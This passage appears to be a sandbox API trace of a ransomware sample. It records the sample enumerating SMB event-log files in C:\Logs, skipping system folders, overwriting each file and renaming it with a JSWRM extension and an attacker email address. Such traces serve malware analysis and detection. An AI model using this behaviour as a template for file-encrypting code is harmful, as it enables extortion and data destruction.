| out: lpFileSize=0x345f630*=69632) returned 1 [0066.113] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0066.114] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0066.120] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.120] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0066.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0066.120] CloseHandle (hObject=0x450) returned 1 [0066.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0066.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0066.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8670, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0066.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0066.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0066.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0066.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0066.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0066.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0066.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23fa98 [0066.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0066.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0066.122] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0066.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0066.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0066.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0066.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0066.123] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97b042f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97b042f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-SMBClient%4Operational.evtx", cAlternateFileName="MID8B0~1.EVT")) returned 1 [0066.123] lstrcmpiW (lpString1="Microsoft-Windows-SMBClient%4Operational.evtx", lpString2=".") returned 1 [0066.123] lstrcmpiW (lpString1="Microsoft-Windows-SMBClient%4Operational.evtx", lpString2="..") returned 1 [0066.124] lstrcmpiW (lpString1="Microsoft-Windows-SMBClient%4Operational.evtx", lpString2="...") returned 1 [0066.124] lstrcmpiW (lpString1="Microsoft-Windows-SMBClient%4Operational.evtx", lpString2="windows") returned -1 [0066.124] lstrcmpiW (lpString1="Microsoft-Windows-SMBClient%4Operational.evtx", lpString2="recovery") returned -1 [0066.124] lstrcmpiW (lpString1="Microsoft-Windows-SMBClient%4Operational.evtx", lpString2="perflogs") returned -1 [0066.124] lstrcmpiW (lpString1="Microsoft-Windows-SMBClient%4Operational.evtx", lpString2="documents and settings") returned 1 [0066.124] lstrcmpiW (lpString1="Microsoft-Windows-SMBClient%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.124] lstrcmpiW (lpString1="Microsoft-Windows-SMBClient%4Operational.evtx", lpString2="system volume information") returned -1 [0066.124] lstrcmpiW (lpString1="Microsoft-Windows-SMBClient%4Operational.evtx", lpString2="msocache") returned -1 [0066.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0066.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SMBClient%4Operational.evtx", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0066.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0066.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SMBClient%4Operational.evtx", cchWideChar=45, lpMultiByteStr=0x1f84e8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-SMBClient%4Operational.evtx", lpUsedDefaultChar=0x0) returned 45 [0066.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0066.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0066.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SMBClient%4Operational.evtx", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0066.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0066.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SMBClient%4Operational.evtx", cchWideChar=45, lpMultiByteStr=0x1f8638, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-SMBClient%4Operational.evtx", lpUsedDefaultChar=0x0) returned 45 [0066.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0066.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0066.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0066.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0066.124] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.124] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0066.124] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0066.124] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0066.130] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.130] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0066.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0066.150] CloseHandle (hObject=0x450) returned 1 [0066.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0066.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0066.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0066.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0066.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0066.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0066.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0066.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0066.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0066.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f720 [0066.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0066.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0066.151] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0066.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0066.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0066.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0066.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0066.152] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97d66c8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97d66c8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-SmbClient%4Security.evtx", cAlternateFileName="MI8CEE~1.EVT")) returned 1 [0066.152] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Security.evtx", lpString2=".") returned 1 [0066.152] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Security.evtx", lpString2="..") returned 1 [0066.152] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Security.evtx", lpString2="...") returned 1 [0066.152] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Security.evtx", lpString2="windows") returned -1 [0066.152] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Security.evtx", lpString2="recovery") returned -1 [0066.152] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Security.evtx", lpString2="perflogs") returned -1 [0066.152] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Security.evtx", lpString2="documents and settings") returned 1 [0066.152] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Security.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.152] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Security.evtx", lpString2="system volume information") returned -1 [0066.152] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Security.evtx", lpString2="msocache") returned -1 [0066.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0066.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SmbClient%4Security.evtx", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0066.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0066.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SmbClient%4Security.evtx", cchWideChar=42, lpMultiByteStr=0x1f87c0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-SmbClient%4Security.evtx", lpUsedDefaultChar=0x0) returned 42 [0066.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0066.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0066.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SmbClient%4Security.evtx", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0066.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0066.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SmbClient%4Security.evtx", cchWideChar=42, lpMultiByteStr=0x1f8328, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-SmbClient%4Security.evtx", lpUsedDefaultChar=0x0) returned 42 [0066.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0066.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0066.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0066.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0066.153] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.154] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0066.154] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0066.154] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0066.159] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.159] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0066.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0066.159] CloseHandle (hObject=0x450) returned 1 [0066.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0066.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0066.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0066.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0066.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0066.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0066.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0066.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217bf0 [0066.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0066.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0066.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217bf0 | out: hHeap=0x1e0000) returned 1 [0066.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0066.161] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.178] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0066.178] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0066.178] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0066.178] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0066.178] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0066.178] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb1ea1c9, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb1ea1c9, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-SMBServer%4Audit.evtx", cAlternateFileName="MIE3AD~1.EVT")) returned 1 [0066.179] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Audit.evtx", lpString2=".") returned 1 [0066.179] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Audit.evtx", lpString2="..") returned 1 [0066.179] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Audit.evtx", lpString2="...") returned 1 [0066.179] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Audit.evtx", lpString2="windows") returned -1 [0066.179] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Audit.evtx", lpString2="recovery") returned -1 [0066.179] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Audit.evtx", lpString2="perflogs") returned -1 [0066.179] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Audit.evtx", lpString2="documents and settings") returned 1 [0066.179] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Audit.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.179] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Audit.evtx", lpString2="system volume information") returned -1 [0066.179] lstrcmpiW (lpString1="Microsoft-Windows-SMBServer%4Audit.evtx", lpString2="msocache") returned -1 [0066.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0066.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SMBServer%4Audit.evtx", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0066.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0066.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SMBServer%4Audit.evtx", cchWideChar=39, lpMultiByteStr=0x1f87c0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-SMBServer%4Audit.evtx", lpUsedDefaultChar=0x0) returned 39 [0066.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0066.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0066.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SMBServer%4Audit.evtx", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0066.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0066.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SMBServer%4Audit.evtx", cchWideChar=39, lpMultiByteStr=0x1f8328, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-SMBServer%4Audit.evtx", lpUsedDefaultChar=0x0) returned 39 [0066.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0066.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0066.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0066.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, 